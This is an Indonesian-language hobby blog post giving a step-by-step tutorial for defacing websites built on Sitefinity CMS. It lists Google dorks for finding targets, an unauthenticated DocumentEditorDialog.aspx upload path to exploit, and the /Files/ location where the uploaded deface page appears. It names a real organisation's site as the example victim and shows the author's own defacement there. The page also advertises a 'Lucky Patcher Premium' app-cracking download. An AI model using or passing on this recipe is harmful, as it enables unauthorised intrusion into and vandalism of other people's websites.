Lattest Post

Lucky Patcher APK

Image
Abdul Wahab - Cheats Game Offline . Watch Now KLIK HERE! Download Lucky Patcher Premium Download Here PERHATIKAN Sebelum Download Harap Dibaca Baca Juga Cara Download dan Lewati Link Di Abdul Wahab klik Here

Tutorial Deface Metode Sitefinity

      Welcome Back to My Blog


Abdul wahab-Meskipun blog gua gratisan tapi ilmu
yang gua kasih gak murahan...
kali ini gua share tentang
"Deface Metode Sitefinity"
        Ok,kalian udah tau kan apaitu deface?kalo belum tau liat artikel gw sebelumnya yaaa....
ok,langsung saja.
bahan-bahan:
-komputer/laptop/hape
-koneksi internet
-kopi
-roti
nah caranya 

1.kalian ng-dork aja digoogle atau pake dork yang udah gw siapain
"Sitefinity: Login"
inurl:/sitefinity/login.aspx
pilih salah satu aja ya...
2.kalian masukkan dorknya kegoogle lalu klik search...
Nah sebagai contoh saya pilih yang atas aja yaa...

http://calstart.org
3.nah setelah itu kalian akan otomatis masuk kehalaman login...setelah itu masukan exploitnya:
/Sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx

nah jadinya
http://calstart.org/Sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx

Nah setelah itu kalian akan masuk kehalaman insert document
nah kalian klik select lalu upload


nah jika berhasil maka tampilannya akan seperti ini...


note:bila gak berhasil berarti webnya gak vuln,cari web yang lain aja
Nah setelah itu kalian cari hasil deface kalian dengan cara gini;
korban/Files/nama script kamu
misal:...
http://calstart.org/Files/iseng.html
nah itu adalah hasil deface saya....sekian terima kasih...

nah bagi yang belum mengerti saya sudah siapin videonya diyoutube
nih linknya Di sini

ok bagi pengikut setia AbdulWahab222...please follow saya on blogKlik Here
dan follow saya juga diyoutubeKlik Here

Comments